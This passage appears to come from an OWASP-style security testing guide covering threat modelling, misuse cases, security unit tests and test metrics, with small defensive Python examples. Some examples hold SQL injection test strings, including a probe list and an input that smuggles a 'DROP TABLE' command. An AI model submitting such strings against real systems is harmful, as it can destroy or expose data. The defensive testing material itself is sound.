Security issues that are identified early in the SDLC can be documented in a test plan so they can be validated later with security tests. By combining the results of different testing techniques, it is possible to derive better security test cases and increase the level of assurance of the security requirements. For example, distinguishing true vulnerabilities from un-exploitable ones is possible when the results of penetration tests and source code analysis are combined.  Considering the security test for a SQL injection vulnerability, for example, a black box test might first involve a scan of the application to fingerprint the vulnerability. The first evidence of a potential SQL injection vulnerability that can be validated is the generation of a SQL exception. A further validation of the SQL injection vulnerability might involve manually injecting attack vectors to modify the grammar of the SQL query for an information disclosure exploit. This might involve a lot of trial-and-error analysis until the malicious query is executed. Assuming the tester has the source code, she might learn from source code analysis how to construct the SQL attack vector that can exploit the vulnerability (e.g., execute a malicious query returning confidential data to an unauthorized user).&lt;br /&gt;
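The &amp;quot;first evidence&amp;quot; step described above can be partially automated. As a hedged sketch (the signature list below is a small, non-exhaustive sample assembled for illustration, not an official catalogue), a scanner might flag HTTP responses whose bodies contain database error signatures:&lt;br /&gt;

```python
# Illustrative sketch: detect the "first evidence" of a potential SQL
# injection point by scanning a response body for database error messages.
import re

SQL_ERROR_SIGNATURES = [
    r"you have an error in your sql syntax",     # MySQL
    r"unclosed quotation mark",                  # SQL Server
    r"ora-\d{5}",                                # Oracle
    r"syntax error at or near",                  # PostgreSQL
]

def looks_like_sql_error(response_body):
    """Return True if the response text contains a known SQL error signature."""
    body = response_body.lower()
    return any(re.search(sig, body) for sig in SQL_ERROR_SIGNATURES)
```

A hit is only evidence of a potential vulnerability; as the text notes, manual injection of attack vectors is still needed to confirm exploitability.&lt;br /&gt;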
&lt;br /&gt;
'''Threats and Countermeasures Taxonomies'''&amp;lt;br&amp;gt;&lt;br /&gt;
A ''threat and countermeasure classification'' that takes into consideration the root causes of vulnerabilities is the critical factor in verifying that security controls are designed, coded, and built so that the impact due to the exposure of such vulnerabilities is mitigated. In the case of web applications, the exposure of security controls to common vulnerabilities, such as the OWASP Top Ten, can be a good starting point for deriving general security requirements. More specifically, the web application security frame [17] provides a classification (i.e., a taxonomy) of vulnerabilities that can be documented in different guidelines and standards and validated with security tests. &lt;br /&gt;
&lt;br /&gt;
The focus of a threat and countermeasure categorization is to define security requirements in terms of the threats and the root cause of the vulnerability. A threat can be categorized by using STRIDE [18], for example, as Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, and Elevation of privilege. The root cause can be categorized as a security flaw in design, a security bug in coding, or an issue due to insecure configuration. For example, the root cause of a weak authentication vulnerability might be the lack of mutual authentication when data crosses a trust boundary between the client and server tiers of the application. A security requirement that captures the threat of repudiation during an architecture design review allows for the documentation of the requirement for the countermeasure (e.g., mutual authentication) that can be validated later on with security tests.&lt;br /&gt;
&lt;br /&gt;
A threat and countermeasure categorization for vulnerabilities can also be used to document security requirements for secure coding, such as secure coding standards. An example of a common coding error in authentication controls is applying a hash function to a password without applying a seed to the value. From the secure coding perspective, this is a vulnerability that affects the encryption used for authentication, with a vulnerability root cause in a coding error. Since the root cause is insecure coding, the security requirement can be documented in secure coding standards and validated through secure code reviews during the development phase of the SDLC.&lt;br /&gt;
&lt;br /&gt;
'''Security Testing and Risk Analysis'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security requirements need to take into consideration the severity of the vulnerabilities to support a ''risk mitigation strategy''. Assuming that the organization maintains a repository of vulnerabilities found in applications, i.e., a vulnerability knowledge base, the security issues can be reported by type, issue, mitigation, root cause, and mapped to the applications where they are found.  Such a vulnerability knowledge base can also be used to establish metrics to analyze the effectiveness of the security tests throughout the SDLC.&lt;br /&gt;
 &lt;br /&gt;
For example, consider an input validation issue, such as a SQL injection, which was identified via source code analysis and reported with a coding error root cause and input validation vulnerability type. The exposure of such a vulnerability can be assessed via a penetration test, by probing input fields with several SQL injection attack vectors. This test might validate that special characters are filtered before hitting the database, thereby mitigating the vulnerability. By combining the results of source code analysis and penetration testing it is possible to determine the likelihood and exposure of the vulnerability and calculate the risk rating of the vulnerability. By reporting vulnerability risk ratings in the findings (e.g., test report) it is possible to decide on the mitigation strategy. For example, high and medium risk vulnerabilities can be prioritized for remediation, while low risk ones can be fixed in further releases.&lt;br /&gt;
&lt;br /&gt;
By considering the threat scenarios exploiting common vulnerabilities it is possible to identify potential risks for which the application security control needs to be security tested. For example, the OWASP Top Ten vulnerabilities can be mapped to attacks such as phishing, privacy violations, identity theft, system compromise, data alteration or data destruction, financial loss, and reputation loss. Such issues should be documented as part of the threat scenarios. By thinking in terms of threats and vulnerabilities, it is possible to devise a battery of tests that simulate such attack scenarios. Ideally, the organization's vulnerability knowledge base can be used to derive security-risk-driven test cases to validate the most likely attack scenarios. For example, if identity theft is considered high risk, negative test scenarios should validate the mitigation of impacts deriving from the exploit of vulnerabilities in authentication, cryptographic controls, input validation, and authorization controls.&lt;br /&gt;
&lt;br /&gt;
===Functional and Non Functional Test Requirements===&lt;br /&gt;
'''Functional Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the perspective of functional security requirements, the applicable standards, policies and regulations drive both the need of a type of security control as well as the control functionality. These requirements are also referred to as “positive requirements”, since they state the expected functionality that can be validated through security tests.&lt;br /&gt;
Examples of positive requirements are: “the application will lock out the user after six failed logon attempts” or “passwords need to be a minimum of six alphanumeric characters”. The validation of positive requirements consists of asserting the expected functionality and, as such, can be tested by re-creating the testing conditions, running the test with predefined inputs, and asserting the expected outcome as a pass/fail condition.&lt;br /&gt;
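A positive requirement of this kind maps directly onto a unit test: predefined input, asserted outcome. In the Python sketch below, `AccountLockout` is a hypothetical stand-in for the control under test, not code from any real application:&lt;br /&gt;

```python
# Hedged sketch: the positive requirement "lock out the user after six
# failed logon attempts" asserted as a pass/fail test. AccountLockout is
# an illustrative stand-in for the real authentication control.

class AccountLockout:
    MAX_FAILURES = 6

    def __init__(self):
        self.failures = 0
        self.locked = False

    def record_failed_logon(self):
        self.failures += 1
        if self.failures >= self.MAX_FAILURES:
            self.locked = True

def test_lockout_after_six_failures():
    account = AccountLockout()
    for _ in range(6):              # predefined input: six failed attempts
        account.record_failed_logon()
    assert account.locked           # expected outcome: account is locked

test_lockout_after_six_failures()
```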
&lt;br /&gt;
In order to validate security requirements with security tests, security requirements need to be function driven and highlight the expected functionality (the what) and implicitly the implementation (the how). Examples of high-level security design requirements for authentication can be:&lt;br /&gt;
*Protect user credentials and shared secrets in transit and in storage&lt;br /&gt;
*Mask any confidential data in display (e.g., passwords, accounts)&lt;br /&gt;
*Lock the user account after a certain number of failed login attempts &lt;br /&gt;
*Do not show specific validation errors to the user as a result of failed logon &lt;br /&gt;
*Only allow passwords that are alphanumeric, include special characters, and are a minimum of six characters in length, to limit the attack surface&lt;br /&gt;
*Allow for password change functionality only to authenticated users by validating the old password, the new password, and the user answer to the challenge question, to prevent brute forcing of a password via password change.&lt;br /&gt;
*The password reset form should validate the user’s username and the user’s registered email before sending the temporary password to the user via email. The temporary password issued should be a one time password. A link to the password reset web page will be sent to the user. The password reset web page should validate the user temporary password, the new password, as well as the user answer to the challenge question.&lt;br /&gt;
&lt;br /&gt;
'''Risk Driven Security Requirements'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security tests also need to be risk driven, that is, they need to validate the application for unexpected behavior. These are also called “negative requirements”, since they specify what the application should not do. &lt;br /&gt;
Examples of &amp;quot;should not do&amp;quot; (negative) requirements are:&lt;br /&gt;
* The application should not allow for the data to be altered or destroyed&lt;br /&gt;
* The application should not be compromised or misused for unauthorized financial transactions by a malicious user.&lt;br /&gt;
&lt;br /&gt;
Negative requirements are more difficult to test, because there is no expected behavior to look for. This might require a threat analyst to come up with unforeseen input conditions, causes, and effects. This is where security testing needs to be driven by risk analysis and threat modeling.&lt;br /&gt;
The key is to document the threat scenarios and the functionality of the countermeasure as a factor to mitigate a threat. For example, in the case of authentication controls, the following security requirements can be documented from the threats and countermeasure perspective:&lt;br /&gt;
*Encrypt authentication data in storage and transit to mitigate risk of information disclosure and authentication protocol attacks&lt;br /&gt;
*Encrypt passwords using non-reversible encryption, such as a digest (e.g., hash) and a seed, to prevent dictionary attacks&lt;br /&gt;
*Lock out accounts after reaching a logon failure threshold and enforce password complexity to mitigate risk of brute force password attacks&lt;br /&gt;
*Display generic error messages upon validation of credentials to mitigate risk of account harvesting/enumeration&lt;br /&gt;
*Mutually authenticate client and server to prevent repudiation and Man In the Middle (MiTM) attacks&lt;br /&gt;
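The &amp;quot;digest and seed&amp;quot; countermeasure in the list above can be sketched with Python's standard library. This is an illustrative sketch only; the PBKDF2 parameters shown are assumptions, not a recommendation from this guide:&lt;br /&gt;

```python
# Sketch of the "digest plus seed" countermeasure: store a salted,
# non-reversible digest of the password, never the password itself.
# Iteration count and salt size are illustrative assumptions.
import hashlib, hmac, os

def hash_password(password, salt=None):
    salt = salt or os.urandom(16)   # per-user random seed (salt)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt, digest

def verify_password(password, salt, expected_digest):
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)  # constant-time compare
```

Because each user gets a different seed, identical passwords produce different digests, which is what defeats precomputed dictionary attacks.&lt;br /&gt;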
&lt;br /&gt;
Threat modeling artifacts such as threat trees and attack libraries can be useful to derive the negative test scenarios. A threat tree will assume a root attack (e.g., attacker might be able to read other users' messages) and identify different exploits of security controls (e.g., data validation fails because of a SQL injection vulnerability) and necessary countermeasures (e.g., implement data validation and parametrized queries) that could be validated to be effective in mitigating such attacks.&lt;br /&gt;
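The &amp;quot;parametrized queries&amp;quot; countermeasure from the threat tree example above can be sketched with the standard library's sqlite3 module; the table and data are hypothetical:&lt;br /&gt;

```python
# Sketch of the parametrized-query countermeasure: user input is bound as
# a parameter, so it can never alter the grammar of the SQL query.
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE messages (owner TEXT, body TEXT)")
conn.execute("INSERT INTO messages VALUES ('alice', 'hello'), ('bob', 'hi')")

def messages_for(owner):
    # The placeholder (?) keeps input such as "alice' OR '1'='1" as data.
    rows = conn.execute(
        "SELECT body FROM messages WHERE owner = ?", (owner,)
    ).fetchall()
    return [body for (body,) in rows]
```

A negative test derived from the threat tree would assert that the classic injection string returns no other user's messages, validating the countermeasure is effective.&lt;br /&gt;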
&lt;br /&gt;
===Security Requirements Derivation Through Use and Misuse Cases===&lt;br /&gt;
A prerequisite to describing the application functionality is understanding what the application is supposed to do and how. This can be done by describing ''use cases''. Use cases, in the graphical form commonly used in software engineering, show the interactions of actors and their relations, and help to identify the actors in the application, their relationships, the intended sequence of actions for each scenario, alternative actions, special requirements, and pre- and post-conditions. Similar to use cases, ''misuse and abuse cases'' [19] describe unintended and malicious use scenarios of the application. These misuse cases provide a way to describe scenarios of how an attacker could misuse and abuse the application. By going through the individual steps in a use scenario and thinking about how it can be maliciously exploited, potential flaws or aspects of the application that are not well defined can be discovered. The key is to describe all possible or, at least, the most critical use and misuse scenarios. Misuse scenarios allow the analysis of the application from the attacker's point of view and contribute to identifying potential vulnerabilities and the countermeasures that need to be implemented to mitigate the impact caused by the potential exposure to such vulnerabilities. Given all of the use and abuse cases, it is important to analyze them to determine which are the most critical and need to be documented in security requirements. The identification of the most critical misuse and abuse cases drives the documentation of security requirements and the necessary controls where security risks should be mitigated.&lt;br /&gt;
&lt;br /&gt;
To derive security requirements from use and misuse cases [20], it is important to define the functional scenarios and the negative scenarios, and to put these in graphical form. In the case of derivation of security requirements for authentication, for example, the following step-by-step methodology can be followed.&lt;br /&gt;
&lt;br /&gt;
*Step 1: Describe the Functional Scenario: User authenticates by supplying username and password. The application grants access to users based upon authentication of user credentials by the application and provides specific errors to the user when validation fails.&lt;br /&gt;
&lt;br /&gt;
*Step 2: Describe the Negative Scenario:  The attacker breaks the authentication through a brute force/dictionary attack of passwords and account harvesting vulnerabilities in the application. The validation errors provide specific information that allows an attacker to guess which accounts are actually valid, registered accounts (usernames). The attacker will then try to brute force the password for such a valid account. A brute force attack against all-digit passwords with a minimum length of four can succeed within a limited number of attempts (i.e., 10^4).&lt;br /&gt;
&lt;br /&gt;
*Step 3: Describe Functional and Negative Scenarios With Use and Misuse Case: The graphical example in Figure below depicts the derivation of security requirements via use and misuse cases. The functional scenario consists of the user actions (entering username and password) and the application actions (authenticating the user and providing an error message if validation fails). The misuse case consists of the attacker actions, i.e., trying to break authentication by brute forcing the password via a dictionary attack and by guessing the valid usernames from error messages. By graphically representing the threats to the user actions (misuses), it is possible to derive the countermeasures as the application actions that mitigate such threats.&lt;br /&gt;
[[Image:UseAndMisuseCase.jpg]]&lt;br /&gt;
&lt;br /&gt;
*Step 4: Elicit The Security Requirements. In this case, the following security requirements for authentication are derived: &lt;br /&gt;
:1) Passwords need to be alphanumeric, lower and upper case, and a minimum of seven characters in length&lt;br /&gt;
:2) Accounts need to lock out after five unsuccessful login attempts&lt;br /&gt;
:3) Logon error messages need to be generic&lt;br /&gt;
These security requirements need to be documented and tested.&lt;br /&gt;
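Requirements elicited this way can be encoded directly as testable checks. In the hedged Python sketch below, the function names and the generic message text are illustrative assumptions; requirement 2 (lockout) can be asserted the same way with a failure counter:&lt;br /&gt;

```python
# Illustrative sketch: requirements 1 and 3 above as directly testable
# checks. Names and message text are assumptions, not prescribed values.
import re

def password_meets_policy(password):
    """Req. 1: alphanumeric, lower and upper case, minimum seven characters."""
    return bool(len(password) >= 7
                and re.search(r"[a-z]", password)
                and re.search(r"[A-Z]", password)
                and re.search(r"[0-9]", password))

GENERIC_LOGON_ERROR = "Invalid username or password."

def logon_error(reason):
    """Req. 3: the same generic message regardless of the failure reason."""
    return GENERIC_LOGON_ERROR  # never reveals whether the username exists
```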
&lt;br /&gt;
===Security Tests Integrated in Developers' and Testers' Workflows===&lt;br /&gt;
'''Developers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
Security testing during the development phase of the SDLC represents the first opportunity for developers to ensure that individual software components that they have developed are security tested before they are integrated with other components and built into the application. Software components might consist of software artifacts such as functions, methods, and classes, as well as application programming interfaces, libraries, and executables. For security testing, developers can rely on the results of the source code analysis to verify statically that the developed source code does not include potential vulnerabilities and is compliant with the secure coding standards. Security unit tests can further verify dynamically (i.e., at run time) that the components function as expected.  Before integrating both new and existing code changes in the application build, the results of the static and dynamic analysis should be reviewed and validated. &lt;br /&gt;
The validation of source code before integration in application builds is usually the responsibility of the senior developer. This senior developer is also the subject matter expert in software security, whose role is to lead the secure code review and make decisions on whether to accept the code to be released in the application build or to require further changes and testing. This secure code review workflow can be enforced via formal acceptance, as well as a check in a workflow management tool. For example, assuming the typical defect management workflow used for functional bugs, security bugs that have been fixed by a developer can be reported on a defect or change management system. The build master can look at the test results reported by the developers in the tool and grant approvals for checking the code changes into the application build.&lt;br /&gt;
&lt;br /&gt;
'''Testers' Security Testing Workflow'''&amp;lt;br&amp;gt;&lt;br /&gt;
After components and code changes are tested by developers and checked into the application build, the most likely next step in the software development process workflow is to perform tests on the application as a whole entity. This level of testing is usually referred to as integrated test and system level test. When security tests are part of these testing activities, they can be used to validate both the security functionality of the application as a whole, as well as the exposure to application level vulnerabilities. These security tests on the application include both white box testing, such as source code analysis, and black box testing, such as penetration testing. Gray box testing is similar to black box testing; in a gray box test, the tester is assumed to have some partial knowledge of the application, such as its session management, which helps in understanding whether the logout and timeout functions are properly secured.&lt;br /&gt;
&lt;br /&gt;
The target for the security tests is the complete system, that is, the artifact that will potentially be attacked, which includes both the whole source code and the executable. One peculiarity of security testing during this phase is that it is possible for security testers to determine whether vulnerabilities can be exploited and expose the application to real risks. &lt;br /&gt;
These include common web application vulnerabilities, as well as security issues that have been identified earlier in the SDLC with other activities such as threat modeling, source code analysis, and secure code reviews. &lt;br /&gt;
&lt;br /&gt;
Usually, testing engineers, rather than software developers, perform security tests when the application is in scope for integration system tests. Such testing engineers have security knowledge of web application vulnerabilities and black box and white box security testing techniques, and own the validation of security requirements in this phase. In order to perform such security tests, it is a pre-requisite that security test cases are documented in the security testing guidelines and procedures.&lt;br /&gt;
&lt;br /&gt;
A testing engineer who validates the security of the application in the integrated system environment might release the application for testing in the operational environment (e.g., user acceptance tests). At this stage of the SDLC (i.e., validation), the application functional testing is usually a responsibility of QA testers, while white-hat hackers/security consultants are usually responsible for security testing. Some organizations rely on their own specialized ethical hacking team in order to conduct such tests when a third party assessment is not required (such as for auditing purposes). &lt;br /&gt;
&lt;br /&gt;
Since these tests are the last resort for fixing vulnerabilities before the application is released to production, it is important that such issues are addressed as recommended by the testing team (e.g., the recommendations can include code, design, or configuration change). At this level, security auditors and information security officers discuss the reported security issues and analyze the potential risks according to information risk management procedures. Such procedures might require the developer team to fix all high risk vulnerabilities before the application could be deployed, unless such risks are acknowledged and accepted.&lt;br /&gt;
&lt;br /&gt;
===Developers' Security Tests===&lt;br /&gt;
'''Security Testing in the Coding Phase: Unit Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
From the developer’s perspective, the main objective of security tests is to validate that code is being developed in compliance with secure coding standards requirements. Developers' own coding artifacts such as functions, methods, classes, APIs, and libraries need to be functionally validated before being integrated into the application build. &lt;br /&gt;
&lt;br /&gt;
The security requirements that developers have to follow should be documented in secure coding standards and validated with static and dynamic analysis. As a testing activity following a secure code review, unit tests can validate that code changes required by secure code reviews are properly implemented. Secure code reviews and source code analysis through source code analysis tools help developers in identifying security issues in source code as it is developed. By using unit tests and dynamic analysis (e.g., debugging) developers can validate the security functionality of components as well as verify that the countermeasures being developed mitigate any security risks previously identified through threat modeling and source code analysis.  &lt;br /&gt;
&lt;br /&gt;
A good practice for developers is to build security test cases as a generic security test suite that is part of the existing unit testing framework. A generic security test suite could be derived from previously defined use and misuse cases to security test functions, methods and classes. A generic security test suite might include security test cases to validate both positive and negative requirements for security controls such as:&lt;br /&gt;
* Authentication &amp;amp; Access Control&lt;br /&gt;
* Input Validation &amp;amp; Encoding&lt;br /&gt;
* Encryption&lt;br /&gt;
* User and Session Management&lt;br /&gt;
* Error and Exception Handling&lt;br /&gt;
* Auditing and Logging&lt;br /&gt;
&lt;br /&gt;
Developers empowered with a source code analysis tool integrated into their IDE, secure coding standards, and a security unit testing framework can assess and verify the security of the software components being developed. Security test cases can be run to identify potential security issues that have root causes in source code: besides input and output validation of parameters entering and exiting the components, these issues include authentication and authorization checks done by the component, protection of the data within the component, secure exception and error handling, and secure auditing and logging. Unit test frameworks such as JUnit, NUnit, and CUnit can be adapted to verify security test requirements. In the case of security functional tests, unit level tests can test the functionality of security controls at the software component level, such as functions, methods, or classes. For example, a test case could validate input and output validation (e.g., variable sanitization) and boundary checks for variables by asserting the expected functionality of the component.&lt;br /&gt;
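A security unit test in this style can be sketched with Python's unittest module standing in for JUnit/NUnit/CUnit. Here `sanitize()` is a hypothetical component under test (its allow-list and length boundary are assumptions for illustration):&lt;br /&gt;

```python
# Sketch: unit tests asserting sanitization and a boundary check on a
# hypothetical input validation component. MAX_LEN is an assumed boundary.
import unittest

MAX_LEN = 32  # illustrative boundary

def sanitize(value):
    """Keep only alphanumeric characters; reject oversized input."""
    cleaned = "".join(ch for ch in value if ch.isalnum())
    if len(cleaned) > MAX_LEN:
        raise ValueError("input exceeds boundary")
    return cleaned

class SanitizeSecurityTests(unittest.TestCase):
    def test_strips_sql_metacharacters(self):
        self.assertEqual(sanitize("bob'; DROP TABLE users--"),
                         "bobDROPTABLEusers")

    def test_rejects_oversized_input(self):
        with self.assertRaises(ValueError):
            sanitize("A" * (MAX_LEN + 1))

# Run with: python -m unittest <module>
```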
&lt;br /&gt;
The threat scenarios identified with use and misuse cases can be used to document the procedures for testing software components. In the case of authentication components, for example, security unit tests can assert the functionality of setting an account lockout as well as the fact that user input parameters cannot be abused to bypass the account lockout (e.g., by setting the account lockout counter to a negative number). At the component level, security unit tests can validate positive assertions as well as negative assertions, such as errors and exception handling. Exceptions should be caught without leaving the system in an insecure state, such as potential denial of service caused by resources not being deallocated (e.g., connection handles not closed within a finally statement block), as well as potential elevation of privileges (e.g., higher privileges acquired before the exception is thrown and not re-set to the previous level before exiting the function). Secure error handling can validate potential information disclosure via informative error messages and stack traces. &lt;br /&gt;
&lt;br /&gt;
Unit level security test cases can be developed by a security engineer who is the subject matter expert in software security and is also responsible for validating that the security issues in the source code have been fixed and can be checked into the integrated system build.  Typically, the manager of the application builds also makes sure that third-party libraries and executable files are security assessed for potential vulnerabilities before being integrated in the application build.&lt;br /&gt;
&lt;br /&gt;
Threat scenarios for common vulnerabilities that have root causes in insecure coding can also be documented in the developer’s security testing guide. When a fix is implemented for a coding defect identified with source code analysis, for example, security test cases can verify that the implementation of the code change follows the secure coding requirements documented in the secure coding standards. &lt;br /&gt;
&lt;br /&gt;
Source code analysis and unit tests can validate that the code change mitigates the vulnerability exposed by the previously identified coding defect. The results of automated secure code analysis can also be used as automatic check-in gates for version control: software artifacts cannot be checked into the build with high or medium severity coding issues.&lt;br /&gt;
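Such a check-in gate can be a very small script. The sketch below assumes a hypothetical findings format; a real gate would parse the actual report format emitted by the organization's scanner:&lt;br /&gt;

```python
# Hedged sketch of an automatic check-in gate: block the check-in when the
# static analysis report contains high or medium severity findings. The
# findings dictionaries are an assumed, illustrative format.

BLOCKING_SEVERITIES = {"high", "medium"}

def gate(findings):
    """Return True (check-in allowed) only if no blocking findings remain."""
    blocking = [f for f in findings if f["severity"] in BLOCKING_SEVERITIES]
    for f in blocking:
        print(f"BLOCKED: {f['id']} ({f['severity']}): {f['title']}")
    return not blocking
```

Wired into version control as a pre-commit or pre-receive hook, the gate enforces the rule that artifacts with high or medium severity coding issues cannot enter the build.&lt;br /&gt;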
&lt;br /&gt;
===Functional Testers' Security Tests===&lt;br /&gt;
'''Security Testing During the Integration and Validation Phase: Integrated System Tests and Operation Tests'''&amp;lt;br&amp;gt;&lt;br /&gt;
The main objective of integrated system tests is to validate the “defense in depth” concept, that is, that the implementation of security controls provides security at different layers. For example, the lack of input validation when calling a component integrated with the application is often a factor that can be tested with integration testing. &lt;br /&gt;
&lt;br /&gt;
The integration system test environment is also the first environment where testers can simulate real attack scenarios as can be potentially executed by a malicious external or internal user of the application. Security testing at this level can validate whether vulnerabilities are real and can be exploited by attackers. For example, a potential vulnerability found in source code can be rated as high risk because of the exposure to potential malicious users, as well as because of the potential impact (e.g., access to confidential information).&lt;br /&gt;
Real attack scenarios can be tested with both manual testing techniques and penetration testing tools. Security tests of this type are also referred to as ethical hacking tests. From the security testing perspective, these are risk driven tests and have the objective to test the application in the operational environment. The target is the application build that is representative of the version of the application being deployed into production.&lt;br /&gt;
&lt;br /&gt;
The execution of security tests in the integration and validation phase is critical to identifying vulnerabilities due to integration of components, as well as to validating the exposure of such vulnerabilities. Application security testing requires a specialized set of skills, including both software and security knowledge, that are not typical of security engineers, so organizations are often required to security-train their software developers on ethical hacking techniques, security assessment procedures, and tools. A realistic scenario is to develop such resources in-house and document them in security testing guides and procedures that take into account the developer’s security testing knowledge. A so-called “security test case cheat sheet or checklist”, for example, can provide simple test cases and attack vectors that testers can use to validate exposure to common vulnerabilities such as spoofing, information disclosure, buffer overflows, format strings, SQL injection and XSS injection, XML, SOAP, and canonicalization issues, denial of service, and flaws in managed code and ActiveX controls (e.g., .NET). A first battery of these tests can be performed manually with a very basic knowledge of software security. The first objective of security tests might be the validation of a set of minimum security requirements. These security test cases might consist of manually forcing the application into error and exceptional states and gathering knowledge from the application's behavior. For example, SQL injection vulnerabilities can be tested manually by injecting attack vectors through user input and by checking if SQL exceptions are thrown back to the user. The evidence of a SQL exception error might be a manifestation of a vulnerability that can be exploited. A more in-depth security test might require the tester’s knowledge of specialized testing techniques and tools. 
Besides source code analysis and penetration testing, these techniques include, for example, source code and binary fault injection, fault propagation analysis and code coverage, fuzz testing, and reverse engineering. The security testing guide should provide procedures and recommend tools that can be used by security testers to perform such in-depth security assessments.&lt;br /&gt;
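The manual SQL injection probe described above can be partly automated by checking responses for raw database error signatures. The attack vectors and signature strings below are a small illustrative sample, not an authoritative list:

```python
# Sample probe inputs a tester might submit through user input fields.
ATTACK_VECTORS = ["'", "' OR '1'='1", "1; --", '"']

# Substrings that often betray an unhandled SQL exception echoed to the
# user. Illustrative only; real scanners use far larger signature sets.
SQL_ERROR_SIGNATURES = [
    "you have an error in your sql syntax",   # MySQL
    "unclosed quotation mark",                # SQL Server
    "ora-01756",                              # Oracle
    "pg::syntaxerror",                        # PostgreSQL
]


def looks_like_sql_error(response_body):
    """Return True if the page body appears to echo a raw database error."""
    body = response_body.lower()
    return any(sig in body for sig in SQL_ERROR_SIGNATURES)
```

A tester would submit each vector through a user input field and run `looks_like_sql_error` on each response; a match is the kind of evidence of an exploitable exception described above, to be confirmed manually.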
&lt;br /&gt;
The next level of security testing after integration system tests is to perform security tests in the user acceptance environment. There are unique advantages to performing security tests in the operational environment. The user acceptance test environment (UAT) is the one that is most representative of the release configuration, with the exception of the data (e.g., test data is used in place of real data). A characteristic of security testing in UAT is testing for security configuration issues. In some cases these vulnerabilities might represent high risks. For example, the server that hosts the web application might not be configured with minimum privileges, a valid SSL certificate, or a secure configuration; non-essential services might be left enabled; and the web root directory might not be cleaned of test and administration web pages.&lt;br /&gt;
&lt;br /&gt;
===Security Test Data Analysis and Reporting===&lt;br /&gt;
'''Goals for Security Test Metrics and Measurements'''&amp;lt;br&amp;gt;&lt;br /&gt;
The definition of the goals for the security testing metrics and measurements is a pre-requisite for using security testing data for risk analysis and management processes. For example, a measurement such as the total number of vulnerabilities found with security tests might quantify the security posture of the application. These measurements also help to identify security objectives for software security testing: for example, reducing the number of vulnerabilities to an acceptable number (minimum) before the application is deployed into production. &lt;br /&gt;
&lt;br /&gt;
Another manageable goal could be to compare the application security posture against a baseline to assess improvements in application security processes. For example, the security metrics baseline might consist of an application that was tested only with penetration tests. The security data obtained from an application that was also security tested during coding should show an improvement (e.g., fewer number of vulnerabilities) when compared with the baseline.&lt;br /&gt;
&lt;br /&gt;
In traditional software testing, the number of software defects, such as the bugs found in an application, could provide a measure of software quality. Similarly, security testing can provide a measure of software security. From the defect management and reporting perspective, software quality and security testing can use similar categorizations for root causes and defect remediation efforts. From the root cause perspective, a security defect can be due to an error in design (e.g., security flaws) or due to an error in coding (e.g., security bug). From the perspective of the effort required to fix a defect, both security and quality defects can be measured in terms of developer hours to implement the fix, the tools and resources required to fix, and, finally, the cost to implement the fix.&lt;br /&gt;
&lt;br /&gt;
A characteristic of security test data, compared to quality data, is the categorization in terms of the threat, the exposure of the vulnerability, and the potential impact posed by the vulnerability to determine the risk. Testing applications for security consists of managing technical risks to make sure that the application countermeasures meet acceptable levels. For this reason, security testing data needs to support the security risk strategy at critical checkpoints during the SDLC. For example, vulnerabilities found in source code with source code analysis represent an initial measure of risk. Such a measure of risk (e.g., high, medium, low) for the vulnerability can be calculated by determining the exposure and likelihood factors, and further by validating the vulnerability with penetration tests. The risk metrics associated with vulnerabilities found with security tests empower business management to make risk management decisions, such as whether risks can be accepted, mitigated, or transferred at different levels within the organization (e.g., business as well as technical).&lt;br /&gt;
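As a sketch of how such a measure of risk might be derived from likelihood and impact factors: the 0-9 factor scales and the three-way thresholds below loosely follow the OWASP Risk Rating Methodology, but the matrix values are illustrative assumptions, not a normative scheme.

```python
def _level(score):
    """Split a 0-9 factor score into thirds (illustrative thresholds)."""
    if score >= 6:
        return "HIGH"
    if score >= 3:
        return "MEDIUM"
    return "LOW"


# (likelihood level, impact level) mapped to an overall High/Medium/Low
# rating, matching the three ratings used in this guide.
SEVERITY = {
    ("LOW", "LOW"): "Low",
    ("LOW", "MEDIUM"): "Low",
    ("LOW", "HIGH"): "Medium",
    ("MEDIUM", "LOW"): "Low",
    ("MEDIUM", "MEDIUM"): "Medium",
    ("MEDIUM", "HIGH"): "High",
    ("HIGH", "LOW"): "Medium",
    ("HIGH", "MEDIUM"): "High",
    ("HIGH", "HIGH"): "High",
}


def risk_rating(likelihood, impact):
    """Combine likelihood and impact (each scored 0-9) into a rating."""
    return SEVERITY[(_level(likelihood), _level(impact))]
```

For example, a vulnerability with high likelihood but negligible impact would rate Medium under this matrix, reflecting the idea that both factors must be weighed before accepting, mitigating, or transferring the risk.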
&lt;br /&gt;
When evaluating the security posture of an application, it is important to take into consideration certain factors, such as the size of the application being developed. Application size has been statistically proven to be related to the number of issues found in the application with tests. One measure of application size is the number of lines of code (LOC) of the application. Typically, software quality defects range from about 7 to 10 defects per thousand lines of new and changed code [21]. Since testing can reduce the overall number by about 25% with one test pass alone, it is logical for larger applications to be tested more, and more often, than smaller ones.&lt;br /&gt;
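A back-of-the-envelope example of the defect-density arithmetic above; the 50 KLOC application size is an assumed figure, while the 7-10 defects/KLOC range and the roughly 25% single-pass reduction come from the text.

```python
def expected_defects(kloc, density_low=7.0, density_high=10.0):
    """Estimate total defects from the 7-10 defects/KLOC range cited in [21]."""
    return kloc * density_low, kloc * density_high


def after_test_pass(defects, reduction=0.25):
    """Apply the roughly 25% reduction attributed to a single test pass."""
    return defects * (1.0 - reduction)


low, high = expected_defects(50)   # a 50 KLOC application (assumed size)
remaining = after_test_pass(high)  # upper-bound defects after one pass
```

For a 50 KLOC application this yields an estimate of 350 to 500 defects, with the upper bound dropping to 375 after a single test pass, which is why larger applications warrant more, and more frequent, testing.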
&lt;br /&gt;
When security testing is done in several phases of the SDLC, the test data could prove the capability of the security tests in detecting vulnerabilities as soon as they are introduced, and prove the effectiveness of removing them by implementing countermeasures at different checkpoints of the SDLC. A measurement of this type is also defined as “containment metrics” and provides a measure of the ability of a security assessment performed at each phase of the development process to maintain security within each phase. These containment metrics are also a critical factor in lowering the cost of fixing vulnerabilities, since it is less expensive to deal with vulnerabilities when they are found (in the same phase of the SDLC) rather than fixing them later in another phase. &lt;br /&gt;
&lt;br /&gt;
Security test metrics can support security risk, cost, and defect management analysis when it is associated with tangible and timed goals such as: &lt;br /&gt;
